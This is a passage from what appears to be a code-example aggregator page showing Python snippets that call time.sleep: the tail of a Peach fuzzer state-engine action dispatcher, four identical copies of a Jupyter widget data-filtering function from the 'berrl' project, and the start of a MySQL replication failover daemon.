                    valueElement = action.getRoot().getByName(str(valueNode.get("fullName")))

                    # Some elements like Block do not have a current or default value
                    if valueElement.currentValue is None and valueElement.defaultValue is None:
                        setElement.currentValue = None
                        setElement.defaultValue = valueElement.getValue()

                    else:
                        setElement.currentValue = valueElement.getValue()
                        setElement.defaultValue = valueElement.defaultValue

                    setElement.value = None

                #print " --- valueElement --- "
                #pub.send(valueElement.getValue())
                #print " --- setElement --- "
                #pub.send(setElement.getValue())
                #print " --------------------"

                else:
                    Debug(1, "Action-Slurp: 2 Setting %s to %s" % (
                        str(node.get("fullName")),
                        repr(action.valueLiteral)
                    ))

                    setElement.defaultValue = action.valueLiteral
                    setElement.currentValue = None
                    setElement.value = None

                    #print " - Total time to slurp data: %.2f" % (time.time() - startTime)

        elif action.type == 'connect':
            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            pub.connect()
            pub.hasBeenConnected = True

        elif action.type == 'accept':
            if not pub.hasBeenStarted:
                pub.start()
                pub.hasBeenStarted = True

            pub.accept()
            pub.hasBeenConnected = True

        elif action.type == 'close':
            if not pub.hasBeenConnected:
                # If we haven't been opened lets ignore
                # this close.
                return

            pub.close()
            pub.hasBeenConnected = False

        elif action.type == 'start':
            pub.start()
            pub.hasBeenStarted = True

        elif action.type == 'stop':
            if pub.hasBeenStarted:
                pub.stop()
                pub.hasBeenStarted = False

        elif action.type == 'wait':
            time.sleep(float(action.valueLiteral))

        else:
            raise Exception("StateEngine._runAction(): Unknown action.type of [%s]" % str(action.type))

        # EVENT: onComplete
        if action.onComplete is not None:
            environment = {
                'Peach': self.engine.peach,
                'Action': action,
                'State': action.parent,
                'Mutator': mutator,
                'StateModel': action.parent.parent,
                'sleep': time.sleep
            }

            evalEvent(action.onComplete, environment, self.engine.peach)

        mutator.onActionFinished(action.parent, action)
        Engine.context.watcher.OnActionComplete(action)

Example 39

Project: berrl
Source File: pipewidgets.py
View license
def instance_widgets(data,dictlist,ouput_filename,geo_feature_type):
	
	# instancing filename for global use
	global filename			
	global initialdata
	global filtereddict
	global dictlistglobal
	initialdata = data
	filename = ouput_filename
	count = 0
	fieldlist = []
	filtereddict = {}
	widgetslist = []
	dictlistglobal = dictlist


	# iterating through each row in dictlist (each widget)
	for row in dictlist:
		# appending row to fieldlist
		fieldlist.append(row['field'])
		#print row,count
		#raw_input('ddd')
		# instancing a global var for geo_feature_type
		global geotype
		geotype  = geo_feature_type

		widget_type = row['type']
		if widget_type == 'FloatSlider' or widget_type == 'IntSlider':
			# getting field and passing in filtereddata/fields
			# as global paramters to wrap the created fruncton
			field = row['field']
			global filtereddata
			global field
			global geotype
			global filename
			global fieldlist
			field = row['field']

			if count == 0:
				# function that takes to min and max
				# then slices df appropriately
				def on_value_change_first(min,max):
					global filtereddata
					global field
					global geotype
					global filename
					global filtereddict
					global initialdata
					global fieldlist
					

					# getting header values
					header = initialdata.columns.values.tolist()

					# slicing the df by min/max
					new = initialdata[(initialdata[field]>=min)&(initialdata[field]<=max)]
					'''
					if len(new) == 0:
						make_dummy(header,geo_feature_type)
					else:
						make_type(new,filename,geo_feature_type)
					'''
					make_dummy(header,geo_feature_type)



					lastupdate = {'value':True}

					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)

					time.sleep(.5)

					# updating json object that will be hashed
					lastupdate = {'value':False}


					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)
					
					filtereddata = new

					if len(filtereddict) == 0:
						filtereddict = {field:filtereddata}
					else:
						filtereddict[field] = filtereddata

					#if dictlistglobal[-1]['field'] == field and len(widgetslist) == len(dictlistglobal) and oldrange == 0:
					if len(widgetslist) == len(dictlistglobal):
						count = 0
						oldrow = fieldlist[0]
						# code to update slices here
						for row in fieldlist[:]:
							count += 1
							if not dictlistglobal[count-1]['type'] == 'Dropdown':
								minval,maxval = filtereddata[row].min(),filtereddata[row].max() 
								testval = tabs.children[count-1].children[0].children[1].value - tabs.children[count-1].children[0].children[0].value
								print (maxval - minval),testval
								if (maxval - minval) < testval:
									tabs.children[count-1].children[0].children[0].value = minval
									tabs.children[count-1].children[0].children[1].value = maxval
						make_type(new,filename,geo_feature_type)
	




				# getting slider 1 and slider2
				slider1,slider2 = row['widget']
				
				# instantiating widget with the desired range slices/function mapping
				on_value_change_first(initialdata[field].min(),initialdata[field].max())

				newwidget = widgets.interactive(on_value_change_first,min=slider1,max=slider2)
				newwidget = widgets.Box(children=[newwidget])
				widgetslist.append(newwidget)
			else:
				field = row['field']
				global tabs
				global oldrange
				oldrange = 0

				# function that takes to min and max
				# then slices df appropriately
				def on_value_change(min,max):
					global filtereddata
					global field
					global geotype
					global filename
					global filtereddict
					global fieldlist
					global tabs
					global oldrange

					field = fieldlist[-1]

					if not dictlistglobal[-1]['field'] == field:
						oldrange = 0


					if fieldlist[0] == field:
						filtereddata = filtereddict[field]
					else:
						#raw_input('xxx')
						filtereddata = get_df(field,fieldlist,filtereddict)
					


					# getting header value
					header = filtereddata.columns.values.tolist()

					# slicing the df by min/max
					new = filtereddata[(filtereddata[field]>=min)&(filtereddata[field]<=max)]
					
					'''
					if len(new) == 0:
						make_dummy(header,geo_feature_type)
					else:
						make_type(new,filename,geo_feature_type)
					'''
					make_dummy(header,geo_feature_type)


					lastupdate = {'value':True}

					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)

					time.sleep(.5)

					# updating json object that will be hashed
					lastupdate = {'value':False}


					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)
					
					filtereddata = new

					filtereddict[field] = filtereddata

					#if not dictlistglobal[-1]['field'] == field:
					#	oldrange = 0


					#if dictlistglobal[-1]['field'] == field and len(widgetslist) == len(dictlistglobal) and oldrange == 0:
					if len(widgetslist) == len(dictlistglobal):
						count = 0
						oldrow = fieldlist[0]
						# code to update slices here
						for row in fieldlist[:]:
							count += 1
							if not dictlistglobal[count-1]['type'] == 'Dropdown':
								minval,maxval = filtereddata[row].min(),filtereddata[row].max() 
								testval = tabs.children[count-1].children[0].children[1].value - tabs.children[count-1].children[0].children[0].value
								print (maxval - minval),testval
								if (maxval - minval) < testval:
									tabs.children[count-1].children[0].children[0].value = minval
									tabs.children[count-1].children[0].children[1].value = maxval
						make_type(new,filename,geo_feature_type)



				# getting slider 1 and slider2
				slider1,slider2 = row['widget']

				# instantiating widget with the desired range slices/function mapping
				on_value_change(initialdata[field].min(),initialdata[field].max())
				newwidget = widgets.interactive(on_value_change,min=slider1,max=slider2)
				newwidget = widgets.Box(children=[newwidget])
				widgetslist.append(newwidget)

		elif widget_type == 'Dropdown':
			global fieldcategory
			global filtereddata
			global geotype
			global filename
			global filtereddict
			global fieldlist
			fieldcategory = row['field']
			uniques = ['ALL'] + np.unique(data[fieldcategory]).tolist()


			# function that slices by category input by 
			# dropdown box within widget
			def slice_by_category(on_dropdown):
				global filtereddata
				global fieldcategory
				global geo_feature_type
				global filename
				global filtereddict
				global fieldlist

				filtereddata = get_df(fieldcategory,fieldlist,filtereddict)
				# getting header
				header = filtereddata.columns.values.tolist()

				# slicing category by appropriate field
				if not on_dropdown == 'ALL':
					new = filtereddata[filtereddata[fieldcategory]==on_dropdown]
				elif on_dropdown == 'ALL':
					new = filtereddata
				
				# updating json object that will be hashed
				lastupdate = {'value':True}


				# checking to see if data actually has values
				if len(new) == 0:
					make_dummy(header,geotype)
				else:
					make_type(new,filename,geotype)


				with open('data.json','wb') as jsonfile:
					json.dump(lastupdate,jsonfile)

				time.sleep(.5)

				# updating json object that will be hashed
				lastupdate = {'value':False}


				with open('data.json','wb') as jsonfile:
					json.dump(lastupdate,jsonfile)

				filtereddata = new

				filtereddict[fieldcategory] = filtereddata  

				print np.unique(new[fieldcategory])
			# getting drop down feature from current row in dictlist
			dropdownwidget = row['widget']

			# instantiating widget for dropdown categorical values in a field
			slice_by_category('ALL')
			dropdownwidget.observe(slice_by_category, names='on_dropdown')
			newwidget = widgets.interactive(slice_by_category,on_dropdown=uniques)
			newwidget = widgets.Box(children = [newwidget])
			widgetslist.append(newwidget)
		print count
		count += 1
	
	tabs = widgets.Tab(children=widgetslist)
	count = 0
	for row in fieldlist:
		tabs.set_title(count,row)
		count += 1
	display(tabs)

Example 40

Project: berrl
Source File: pipewidgets.py
View license
def instance_widgets(data,dictlist,ouput_filename,geo_feature_type):
	
	# instancing filename for global use
	global filename			
	global initialdata
	global filtereddict
	global dictlistglobal
	initialdata = data
	filename = ouput_filename
	count = 0
	fieldlist = []
	filtereddict = {}
	widgetslist = []
	dictlistglobal = dictlist


	# iterating through each row in dictlist (each widget)
	for row in dictlist:
		# appending row to fieldlist
		fieldlist.append(row['field'])
		#print row,count
		#raw_input('ddd')
		# instancing a global var for geo_feature_type
		global geotype
		geotype  = geo_feature_type

		widget_type = row['type']
		if widget_type == 'FloatSlider' or widget_type == 'IntSlider':
			# getting field and passing in filtereddata/fields
			# as global paramters to wrap the created fruncton
			field = row['field']
			global filtereddata
			global field
			global geotype
			global filename
			global fieldlist
			field = row['field']

			if count == 0:
				# function that takes to min and max
				# then slices df appropriately
				def on_value_change_first(min,max):
					global filtereddata
					global field
					global geotype
					global filename
					global filtereddict
					global initialdata
					global fieldlist
					

					# getting header values
					header = initialdata.columns.values.tolist()

					# slicing the df by min/max
					new = initialdata[(initialdata[field]>=min)&(initialdata[field]<=max)]
					'''
					if len(new) == 0:
						make_dummy(header,geo_feature_type)
					else:
						make_type(new,filename,geo_feature_type)
					'''
					make_dummy(header,geo_feature_type)



					lastupdate = {'value':True}

					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)

					time.sleep(.5)

					# updating json object that will be hashed
					lastupdate = {'value':False}


					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)
					
					filtereddata = new

					if len(filtereddict) == 0:
						filtereddict = {field:filtereddata}
					else:
						filtereddict[field] = filtereddata

					#if dictlistglobal[-1]['field'] == field and len(widgetslist) == len(dictlistglobal) and oldrange == 0:
					if len(widgetslist) == len(dictlistglobal):
						count = 0
						oldrow = fieldlist[0]
						# code to update slices here
						for row in fieldlist[:]:
							count += 1
							if not dictlistglobal[count-1]['type'] == 'Dropdown':
								minval,maxval = filtereddata[row].min(),filtereddata[row].max() 
								testval = tabs.children[count-1].children[0].children[1].value - tabs.children[count-1].children[0].children[0].value
								print (maxval - minval),testval
								if (maxval - minval) < testval:
									tabs.children[count-1].children[0].children[0].value = minval
									tabs.children[count-1].children[0].children[1].value = maxval
						make_type(new,filename,geo_feature_type)
	




				# getting slider 1 and slider2
				slider1,slider2 = row['widget']
				
				# instantiating widget with the desired range slices/function mapping
				on_value_change_first(initialdata[field].min(),initialdata[field].max())

				newwidget = widgets.interactive(on_value_change_first,min=slider1,max=slider2)
				newwidget = widgets.Box(children=[newwidget])
				widgetslist.append(newwidget)
			else:
				field = row['field']
				global tabs
				global oldrange
				oldrange = 0

				# function that takes to min and max
				# then slices df appropriately
				def on_value_change(min,max):
					global filtereddata
					global field
					global geotype
					global filename
					global filtereddict
					global fieldlist
					global tabs
					global oldrange

					field = fieldlist[-1]

					if not dictlistglobal[-1]['field'] == field:
						oldrange = 0


					if fieldlist[0] == field:
						filtereddata = filtereddict[field]
					else:
						#raw_input('xxx')
						filtereddata = get_df(field,fieldlist,filtereddict)
					


					# getting header value
					header = filtereddata.columns.values.tolist()

					# slicing the df by min/max
					new = filtereddata[(filtereddata[field]>=min)&(filtereddata[field]<=max)]
					
					'''
					if len(new) == 0:
						make_dummy(header,geo_feature_type)
					else:
						make_type(new,filename,geo_feature_type)
					'''
					make_dummy(header,geo_feature_type)


					lastupdate = {'value':True}

					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)

					time.sleep(.5)

					# updating json object that will be hashed
					lastupdate = {'value':False}


					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)
					
					filtereddata = new

					filtereddict[field] = filtereddata

					#if not dictlistglobal[-1]['field'] == field:
					#	oldrange = 0


					#if dictlistglobal[-1]['field'] == field and len(widgetslist) == len(dictlistglobal) and oldrange == 0:
					if len(widgetslist) == len(dictlistglobal):
						count = 0
						oldrow = fieldlist[0]
						# code to update slices here
						for row in fieldlist[:]:
							count += 1
							if not dictlistglobal[count-1]['type'] == 'Dropdown':
								minval,maxval = filtereddata[row].min(),filtereddata[row].max() 
								testval = tabs.children[count-1].children[0].children[1].value - tabs.children[count-1].children[0].children[0].value
								print (maxval - minval),testval
								if (maxval - minval) < testval:
									tabs.children[count-1].children[0].children[0].value = minval
									tabs.children[count-1].children[0].children[1].value = maxval
						make_type(new,filename,geo_feature_type)



				# getting slider 1 and slider2
				slider1,slider2 = row['widget']

				# instantiating widget with the desired range slices/function mapping
				on_value_change(initialdata[field].min(),initialdata[field].max())
				newwidget = widgets.interactive(on_value_change,min=slider1,max=slider2)
				newwidget = widgets.Box(children=[newwidget])
				widgetslist.append(newwidget)

		elif widget_type == 'Dropdown':
			global fieldcategory
			global filtereddata
			global geotype
			global filename
			global filtereddict
			global fieldlist
			fieldcategory = row['field']
			uniques = ['ALL'] + np.unique(data[fieldcategory]).tolist()


			# function that slices by category input by 
			# dropdown box within widget
			def slice_by_category(on_dropdown):
				global filtereddata
				global fieldcategory
				global geo_feature_type
				global filename
				global filtereddict
				global fieldlist

				filtereddata = get_df(fieldcategory,fieldlist,filtereddict)
				# getting header
				header = filtereddata.columns.values.tolist()

				# slicing category by appropriate field
				if not on_dropdown == 'ALL':
					new = filtereddata[filtereddata[fieldcategory]==on_dropdown]
				elif on_dropdown == 'ALL':
					new = filtereddata
				
				# updating json object that will be hashed
				lastupdate = {'value':True}


				# checking to see if data actually has values
				if len(new) == 0:
					make_dummy(header,geotype)
				else:
					make_type(new,filename,geotype)


				with open('data.json','wb') as jsonfile:
					json.dump(lastupdate,jsonfile)

				time.sleep(.5)

				# updating json object that will be hashed
				lastupdate = {'value':False}


				with open('data.json','wb') as jsonfile:
					json.dump(lastupdate,jsonfile)

				filtereddata = new

				filtereddict[fieldcategory] = filtereddata  

				print np.unique(new[fieldcategory])
			# getting drop down feature from current row in dictlist
			dropdownwidget = row['widget']

			# instantiating widget for dropdown categorical values in a field
			slice_by_category('ALL')
			dropdownwidget.observe(slice_by_category, names='on_dropdown')
			newwidget = widgets.interactive(slice_by_category,on_dropdown=uniques)
			newwidget = widgets.Box(children = [newwidget])
			widgetslist.append(newwidget)
		print count
		count += 1
	
	tabs = widgets.Tab(children=widgetslist)
	count = 0
	for row in fieldlist:
		tabs.set_title(count,row)
		count += 1
	display(tabs)

Example 41

Project: berrl
Source File: pipewidgets.py
View license
def instance_widgets(data,dictlist,ouput_filename,geo_feature_type):
	
	# instancing filename for global use
	global filename			
	global initialdata
	global filtereddict
	global dictlistglobal
	initialdata = data
	filename = ouput_filename
	count = 0
	fieldlist = []
	filtereddict = {}
	widgetslist = []
	dictlistglobal = dictlist


	# iterating through each row in dictlist (each widget)
	for row in dictlist:
		# appending row to fieldlist
		fieldlist.append(row['field'])
		#print row,count
		#raw_input('ddd')
		# instancing a global var for geo_feature_type
		global geotype
		geotype  = geo_feature_type

		widget_type = row['type']
		if widget_type == 'FloatSlider' or widget_type == 'IntSlider':
			# getting field and passing in filtereddata/fields
			# as global paramters to wrap the created fruncton
			field = row['field']
			global filtereddata
			global field
			global geotype
			global filename
			global fieldlist
			field = row['field']

			if count == 0:
				# function that takes to min and max
				# then slices df appropriately
				def on_value_change_first(min,max):
					global filtereddata
					global field
					global geotype
					global filename
					global filtereddict
					global initialdata
					global fieldlist
					

					# getting header values
					header = initialdata.columns.values.tolist()

					# slicing the df by min/max
					new = initialdata[(initialdata[field]>=min)&(initialdata[field]<=max)]
					'''
					if len(new) == 0:
						make_dummy(header,geo_feature_type)
					else:
						make_type(new,filename,geo_feature_type)
					'''
					make_dummy(header,geo_feature_type)



					lastupdate = {'value':True}

					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)

					time.sleep(.5)

					# updating json object that will be hashed
					lastupdate = {'value':False}


					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)
					
					filtereddata = new

					if len(filtereddict) == 0:
						filtereddict = {field:filtereddata}
					else:
						filtereddict[field] = filtereddata

					#if dictlistglobal[-1]['field'] == field and len(widgetslist) == len(dictlistglobal) and oldrange == 0:
					if len(widgetslist) == len(dictlistglobal):
						count = 0
						oldrow = fieldlist[0]
						# code to update slices here
						for row in fieldlist[:]:
							count += 1
							if not dictlistglobal[count-1]['type'] == 'Dropdown':
								minval,maxval = filtereddata[row].min(),filtereddata[row].max() 
								testval = tabs.children[count-1].children[0].children[1].value - tabs.children[count-1].children[0].children[0].value
								print (maxval - minval),testval
								if (maxval - minval) < testval:
									tabs.children[count-1].children[0].children[0].value = minval
									tabs.children[count-1].children[0].children[1].value = maxval
						make_type(new,filename,geo_feature_type)
	




				# getting slider 1 and slider2
				slider1,slider2 = row['widget']
				
				# instantiating widget with the desired range slices/function mapping
				on_value_change_first(initialdata[field].min(),initialdata[field].max())

				newwidget = widgets.interactive(on_value_change_first,min=slider1,max=slider2)
				newwidget = widgets.Box(children=[newwidget])
				widgetslist.append(newwidget)
			else:
				field = row['field']
				global tabs
				global oldrange
				oldrange = 0

				# function that takes to min and max
				# then slices df appropriately
				def on_value_change(min,max):
					global filtereddata
					global field
					global geotype
					global filename
					global filtereddict
					global fieldlist
					global tabs
					global oldrange

					field = fieldlist[-1]

					if not dictlistglobal[-1]['field'] == field:
						oldrange = 0


					if fieldlist[0] == field:
						filtereddata = filtereddict[field]
					else:
						#raw_input('xxx')
						filtereddata = get_df(field,fieldlist,filtereddict)
					


					# getting header value
					header = filtereddata.columns.values.tolist()

					# slicing the df by min/max
					new = filtereddata[(filtereddata[field]>=min)&(filtereddata[field]<=max)]
					
					'''
					if len(new) == 0:
						make_dummy(header,geo_feature_type)
					else:
						make_type(new,filename,geo_feature_type)
					'''
					make_dummy(header,geo_feature_type)


					lastupdate = {'value':True}

					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)

					time.sleep(.5)

					# updating json object that will be hashed
					lastupdate = {'value':False}


					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)
					
					filtereddata = new

					filtereddict[field] = filtereddata

					#if not dictlistglobal[-1]['field'] == field:
					#	oldrange = 0


					#if dictlistglobal[-1]['field'] == field and len(widgetslist) == len(dictlistglobal) and oldrange == 0:
					if len(widgetslist) == len(dictlistglobal):
						count = 0
						oldrow = fieldlist[0]
						# code to update slices here
						for row in fieldlist[:]:
							count += 1
							if not dictlistglobal[count-1]['type'] == 'Dropdown':
								minval,maxval = filtereddata[row].min(),filtereddata[row].max() 
								testval = tabs.children[count-1].children[0].children[1].value - tabs.children[count-1].children[0].children[0].value
								print (maxval - minval),testval
								if (maxval - minval) < testval:
									tabs.children[count-1].children[0].children[0].value = minval
									tabs.children[count-1].children[0].children[1].value = maxval
						make_type(new,filename,geo_feature_type)



				# getting slider 1 and slider2
				slider1,slider2 = row['widget']

				# instantiating widget with the desired range slices/function mapping
				on_value_change(initialdata[field].min(),initialdata[field].max())
				newwidget = widgets.interactive(on_value_change,min=slider1,max=slider2)
				newwidget = widgets.Box(children=[newwidget])
				widgetslist.append(newwidget)

		elif widget_type == 'Dropdown':
			global fieldcategory
			global filtereddata
			global geotype
			global filename
			global filtereddict
			global fieldlist
			fieldcategory = row['field']
			uniques = ['ALL'] + np.unique(data[fieldcategory]).tolist()


			# function that slices by category input by 
			# dropdown box within widget
			def slice_by_category(on_dropdown):
				global filtereddata
				global fieldcategory
				global geo_feature_type
				global filename
				global filtereddict
				global fieldlist

				filtereddata = get_df(fieldcategory,fieldlist,filtereddict)
				# getting header
				header = filtereddata.columns.values.tolist()

				# slicing category by appropriate field
				if not on_dropdown == 'ALL':
					new = filtereddata[filtereddata[fieldcategory]==on_dropdown]
				elif on_dropdown == 'ALL':
					new = filtereddata
				
				# updating json object that will be hashed
				lastupdate = {'value':True}


				# checking to see if data actually has values
				if len(new) == 0:
					make_dummy(header,geotype)
				else:
					make_type(new,filename,geotype)


				with open('data.json','wb') as jsonfile:
					json.dump(lastupdate,jsonfile)

				time.sleep(.5)

				# updating json object that will be hashed
				lastupdate = {'value':False}


				with open('data.json','wb') as jsonfile:
					json.dump(lastupdate,jsonfile)

				filtereddata = new

				filtereddict[fieldcategory] = filtereddata  

				print np.unique(new[fieldcategory])
			# getting drop down feature from current row in dictlist
			dropdownwidget = row['widget']

			# instantiating widget for dropdown categorical values in a field
			slice_by_category('ALL')
			dropdownwidget.observe(slice_by_category, names='on_dropdown')
			newwidget = widgets.interactive(slice_by_category,on_dropdown=uniques)
			newwidget = widgets.Box(children = [newwidget])
			widgetslist.append(newwidget)
		print count
		count += 1
	
	tabs = widgets.Tab(children=widgetslist)
	count = 0
	for row in fieldlist:
		tabs.set_title(count,row)
		count += 1
	display(tabs)

Example 42

Project: berrl
Source File: pipewidgets.py
View license
def instance_widgets(data,dictlist,ouput_filename,geo_feature_type):
	
	# instancing filename for global use
	global filename			
	global initialdata
	global filtereddict
	global dictlistglobal
	initialdata = data
	filename = ouput_filename
	count = 0
	fieldlist = []
	filtereddict = {}
	widgetslist = []
	dictlistglobal = dictlist


	# iterating through each row in dictlist (each widget)
	for row in dictlist:
		# appending row to fieldlist
		fieldlist.append(row['field'])
		#print row,count
		#raw_input('ddd')
		# instancing a global var for geo_feature_type
		global geotype
		geotype  = geo_feature_type

		widget_type = row['type']
		if widget_type == 'FloatSlider' or widget_type == 'IntSlider':
			# getting field and passing in filtereddata/fields
			# as global paramters to wrap the created fruncton
			field = row['field']
			global filtereddata
			global field
			global geotype
			global filename
			global fieldlist
			field = row['field']

			if count == 0:
				# function that takes to min and max
				# then slices df appropriately
				def on_value_change_first(min,max):
					global filtereddata
					global field
					global geotype
					global filename
					global filtereddict
					global initialdata
					global fieldlist
					

					# getting header values
					header = initialdata.columns.values.tolist()

					# slicing the df by min/max
					new = initialdata[(initialdata[field]>=min)&(initialdata[field]<=max)]
					'''
					if len(new) == 0:
						make_dummy(header,geo_feature_type)
					else:
						make_type(new,filename,geo_feature_type)
					'''
					make_dummy(header,geo_feature_type)



					lastupdate = {'value':True}

					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)

					time.sleep(.5)

					# updating json object that will be hashed
					lastupdate = {'value':False}


					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)
					
					filtereddata = new

					if len(filtereddict) == 0:
						filtereddict = {field:filtereddata}
					else:
						filtereddict[field] = filtereddata

					#if dictlistglobal[-1]['field'] == field and len(widgetslist) == len(dictlistglobal) and oldrange == 0:
					if len(widgetslist) == len(dictlistglobal):
						count = 0
						oldrow = fieldlist[0]
						# code to update slices here
						for row in fieldlist[:]:
							count += 1
							if not dictlistglobal[count-1]['type'] == 'Dropdown':
								minval,maxval = filtereddata[row].min(),filtereddata[row].max() 
								testval = tabs.children[count-1].children[0].children[1].value - tabs.children[count-1].children[0].children[0].value
								print (maxval - minval),testval
								if (maxval - minval) < testval:
									tabs.children[count-1].children[0].children[0].value = minval
									tabs.children[count-1].children[0].children[1].value = maxval
						make_type(new,filename,geo_feature_type)
	




				# getting slider 1 and slider2
				slider1,slider2 = row['widget']
				
				# instantiating widget with the desired range slices/function mapping
				on_value_change_first(initialdata[field].min(),initialdata[field].max())

				newwidget = widgets.interactive(on_value_change_first,min=slider1,max=slider2)
				newwidget = widgets.Box(children=[newwidget])
				widgetslist.append(newwidget)
			else:
				field = row['field']
				global tabs
				global oldrange
				oldrange = 0

				# function that takes to min and max
				# then slices df appropriately
				def on_value_change(min,max):
					global filtereddata
					global field
					global geotype
					global filename
					global filtereddict
					global fieldlist
					global tabs
					global oldrange

					field = fieldlist[-1]

					if not dictlistglobal[-1]['field'] == field:
						oldrange = 0


					if fieldlist[0] == field:
						filtereddata = filtereddict[field]
					else:
						#raw_input('xxx')
						filtereddata = get_df(field,fieldlist,filtereddict)
					


					# getting header value
					header = filtereddata.columns.values.tolist()

					# slicing the df by min/max
					new = filtereddata[(filtereddata[field]>=min)&(filtereddata[field]<=max)]
					
					'''
					if len(new) == 0:
						make_dummy(header,geo_feature_type)
					else:
						make_type(new,filename,geo_feature_type)
					'''
					make_dummy(header,geo_feature_type)


					lastupdate = {'value':True}

					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)

					time.sleep(.5)

					# updating json object that will be hashed
					lastupdate = {'value':False}


					with open('data.json','wb') as jsonfile:
						json.dump(lastupdate,jsonfile)
					
					filtereddata = new

					filtereddict[field] = filtereddata

					#if not dictlistglobal[-1]['field'] == field:
					#	oldrange = 0


					#if dictlistglobal[-1]['field'] == field and len(widgetslist) == len(dictlistglobal) and oldrange == 0:
					if len(widgetslist) == len(dictlistglobal):
						count = 0
						oldrow = fieldlist[0]
						# code to update slices here
						for row in fieldlist[:]:
							count += 1
							if not dictlistglobal[count-1]['type'] == 'Dropdown':
								minval,maxval = filtereddata[row].min(),filtereddata[row].max() 
								testval = tabs.children[count-1].children[0].children[1].value - tabs.children[count-1].children[0].children[0].value
								print (maxval - minval),testval
								if (maxval - minval) < testval:
									tabs.children[count-1].children[0].children[0].value = minval
									tabs.children[count-1].children[0].children[1].value = maxval
						make_type(new,filename,geo_feature_type)



				# getting slider 1 and slider2
				slider1,slider2 = row['widget']

				# instantiating widget with the desired range slices/function mapping
				on_value_change(initialdata[field].min(),initialdata[field].max())
				newwidget = widgets.interactive(on_value_change,min=slider1,max=slider2)
				newwidget = widgets.Box(children=[newwidget])
				widgetslist.append(newwidget)

		elif widget_type == 'Dropdown':
			global fieldcategory
			global filtereddata
			global geotype
			global filename
			global filtereddict
			global fieldlist
			fieldcategory = row['field']
			uniques = ['ALL'] + np.unique(data[fieldcategory]).tolist()


			# function that slices by category input by 
			# dropdown box within widget
			def slice_by_category(on_dropdown):
				global filtereddata
				global fieldcategory
				global geo_feature_type
				global filename
				global filtereddict
				global fieldlist

				filtereddata = get_df(fieldcategory,fieldlist,filtereddict)
				# getting header
				header = filtereddata.columns.values.tolist()

				# slicing category by appropriate field
				if not on_dropdown == 'ALL':
					new = filtereddata[filtereddata[fieldcategory]==on_dropdown]
				elif on_dropdown == 'ALL':
					new = filtereddata
				
				# updating json object that will be hashed
				lastupdate = {'value':True}


				# checking to see if data actually has values
				if len(new) == 0:
					make_dummy(header,geotype)
				else:
					make_type(new,filename,geotype)


				with open('data.json','wb') as jsonfile:
					json.dump(lastupdate,jsonfile)

				time.sleep(.5)

				# updating json object that will be hashed
				lastupdate = {'value':False}


				with open('data.json','wb') as jsonfile:
					json.dump(lastupdate,jsonfile)

				filtereddata = new

				filtereddict[fieldcategory] = filtereddata  

				print np.unique(new[fieldcategory])
			# getting drop down feature from current row in dictlist
			dropdownwidget = row['widget']

			# instantiating widget for dropdown categorical values in a field
			slice_by_category('ALL')
			dropdownwidget.observe(slice_by_category, names='on_dropdown')
			newwidget = widgets.interactive(slice_by_category,on_dropdown=uniques)
			newwidget = widgets.Box(children = [newwidget])
			widgetslist.append(newwidget)
		print count
		count += 1
	
	tabs = widgets.Tab(children=widgetslist)
	count = 0
	for row in fieldlist:
		tabs.set_title(count,row)
		count += 1
	display(tabs)

Example 43

Project: mysql-utilities
Source File: failover_daemon.py
View license
    def run(self):
        """Run automatic failover.

        This method implements the automatic failover facility. It the existing
        failover() method of the RplCommands class to conduct failover.

        When the master goes down, the method can perform one of three actions:

        1) failover to list of candidates first then slaves
        2) failover to list of candidates only
        3) fail

        rpl[in]        instance of the RplCommands class
        interval[in]   time in seconds to wait to check status of servers

        Returns bool - True = success, raises exception on error
        """
        failover_mode = self.mode
        pingtime = self.options.get("pingtime", 3)
        exec_fail = self.options.get("exec_fail", None)
        post_fail = self.options.get("post_fail", None)
        pedantic = self.options.get("pedantic", False)

        # Only works for GTID_MODE=ON
        if not self.rpl.topology.gtid_enabled():
            msg = ("Topology must support global transaction ids and have "
                   "GTID_MODE=ON.")
            self._report(msg, logging.CRITICAL)
            raise UtilRplError(msg)

        # Require --master-info-repository=TABLE for all slaves
        if not self.rpl.topology.check_master_info_type("TABLE"):
            msg = ("Failover requires --master-info-repository=TABLE for "
                   "all slaves.")
            self._report(msg, logging.ERROR, False)
            raise UtilRplError(msg)

        # Check for mixing IP and hostnames
        if not self.rpl.check_host_references():
            print("# WARNING: {0}".format(HOST_IP_WARNING))
            self._report(HOST_IP_WARNING, logging.WARN, False)
            print("#\n# Failover daemon will start in 10 seconds.")
            time.sleep(10)

        # Test failover script. If it doesn't exist, fail.
        no_exec_fail_msg = ("Failover check script cannot be found. Please "
                            "check the path and filename for accuracy and "
                            "restart the failover daemon.")
        if exec_fail is not None and not os.path.exists(exec_fail):
            self._report(no_exec_fail_msg, logging.CRITICAL, False)
            raise UtilRplError(no_exec_fail_msg)

        # Check existence of errant transactions on slaves
        errant_tnx = self.rpl.topology.find_errant_transactions()
        if errant_tnx:
            print("# WARNING: {0}".format(_ERRANT_TNX_ERROR))
            self._report(_ERRANT_TNX_ERROR, logging.WARN, False)
            for host, port, tnx_set in errant_tnx:
                errant_msg = (" - For slave '{0}@{1}': "
                              "{2}".format(host, port, ", ".join(tnx_set)))
                print("# {0}".format(errant_msg))
                self._report(errant_msg, logging.WARN, False)
            # Raise an exception (to stop) if pedantic mode is ON
            if pedantic:
                msg = ("{0} Note: If you want to ignore this issue, please do "
                       "not use the --pedantic option."
                       "".format(_ERRANT_TNX_ERROR))
                self._report(msg, logging.CRITICAL)
                raise UtilRplError(msg)

        self._report("Failover daemon started.", logging.INFO, False)
        self._report("Failover mode = {0}.".format(failover_mode),
                     logging.INFO, False)

